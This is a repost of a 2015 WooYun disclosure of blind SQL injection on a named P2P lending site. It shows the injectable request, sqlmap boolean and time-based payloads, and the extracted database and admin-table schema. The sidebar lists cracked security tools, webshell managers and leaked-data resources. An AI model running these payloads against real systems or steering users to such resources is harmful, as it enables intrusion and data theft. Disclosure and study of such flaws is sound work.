P2P金融安全之好贷网某站存在SQL盲注各种admin
- 发表于
- WooYun漏洞库
- 65 阅读
漏洞概要
缺陷编号:WooYun-2015-0128247
漏洞标题:P2P金融安全之好贷网某站存在SQL盲注各种admin
相关厂商:好贷网
漏洞作者:二维码
提交时间:2015-07-22 07:34
公开时间:2015-09-05 10:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
漏洞详情
披露状态:
2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-05: 细节向公众公开
简要描述:
好在是布尔型盲注,跑的速度还行。表里各种adminamount
详细说明:
注入点:
1 2 3 4 5 6 7 8 9 | GET /list/index/city/beijing*/xd_type/gouche/money/10/month/12.html HTTP/1.1<br> X-Requested-With: XMLHttpRequest<br> Referer: http://open.haodai.com:80/<br> Cookie: PHPSESSID=gc4u5iaklethl5v2c7ap443562; city=beijing; LANDING_PAGE=http%3A%2F%2Fopen.haodai.com%2F; desktop=0; REFERER=open.haodai.com; SOURCE_URL=http%3A%2F%2Fopen.haodai.com%2F<br> Host: open.haodai.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br> Accept: */* |
漏洞证明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | back-end DBMS: MySQL 5.0.12<br> sqlmap resumed the following injection point(s) from stored session:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://open.haodai.com:80/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO/xd_type/gouche/money/10/month/12.htmlType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: http://open.haodai.com:80/list/index/city/beijing') AND (SELECT * FROM (SELECT(SLEEP(5)))WiVp) AND ('uRUa'='uRUa/xd_type/gouche/money/10/month/12.html<br> ---<br> back-end DBMS: MySQL 5.0.12<br> available databases [2]:<br> [*] hd<br> [*] information_schema |
user:
1 | back-end DBMS: MySQL 5.0.12<br>current user: '[email protected]%' |
admin表:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | back-end DBMS: MySQL 5.0.12<br> Database: hd<br> Table: admin<br> [24 columns]<br> +--------------+-----------------------+<br> | Column | Type |<br> +--------------+-----------------------+<br> | agent_num | char(12) |<br> | agent_passwd | varchar(16) |<br> | agent_phone | varchar(16) |<br> | auth | varchar(1024) |<br> | citys | text |<br> | citys_iued | text |<br> | email | varchar(255) |<br> | id | int(10) unsigned |<br> | isreadtj | tinyint(1) unsigned |<br> | iutypes | text |<br> | menuid | smallint(5) unsigned |<br> | name | varchar(32) |<br> | pwd | char(60) |<br> | pwd_key | varchar(32) |<br> | qq | char(11) |<br> | relation | int(10) unsigned |<br> | role | varchar(10) |<br> | stat | tinyint(3) unsigned |<br> | tel | char(11) |<br> | tquin | int(11) unsigned |<br> | type | tinyint(3) unsigned |<br> | weixin | char(32) |<br> | xdtypes | text |<br> | zone_id | mediumint(8) unsigned |<br> +--------------+-----------------------+ |
太晚了,具体的一些敏感信息就不跑了,毕竟是金融站。
修复方案:
这个你们更专业
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-07-2210:38
厂商回复:
多谢
最新状态:
暂无
评价
- 2010-01-01 00:00 ddbug 白帽子 | Rank:2 漏洞数:2)
怎么知道在那个地方呢?
2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)怎么网贷注入的payload都差不多
原文连接:P2P金融安全之好贷网某站存在SQL盲注各种admin 所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
- BurpSuite pro v2.1破解版burp-loader-keygen
- BurpSuite自动化blind-xss插件:Femida-xss
- SQLi Dumper v9.9.6破解版
- 魔兽争霸RPG地图破解/解密工具:X-deprotect
- Google Adsense全新的自动广告功能
- PHP 7.0-7.3 disable_functions bypass
- Tor Browser 9更新了,Tor矛与盾的矛盾
- 身份证丢失后怎么办?身份证安全指南
- 魔兽争霸RPG地图破解/解密三剑客
- 解决 macOS Catalina 已损坏无法打开
- SQLi Dumper v9.8.4破解版/SQL注入工具
- Charles 4.5.1逆向工程/破解
- 目录/文件/DNS/VHost暴力破解工具:Gobuster
- PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
- 使用XOR异或绕过WAF拦截:XORpass
- 2019/2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- 谷歌识图,以图搜图
- 【透明互联网】社工库 Social Engineering Data
- 思维导图v9.1.157注册码
- 社工库源码大全(持续更新)
- No Access-Control-Allow-Origin 跨域错误解决
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- Google SQL 注入搜索列表
- npm install慢/无响应解决方案
- 谷歌访问助手破解版
- “冰蝎”动态二进制加密网站管理客户端 – WebShell管理工具
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:
体验盒子扫码分享
打赏零钱
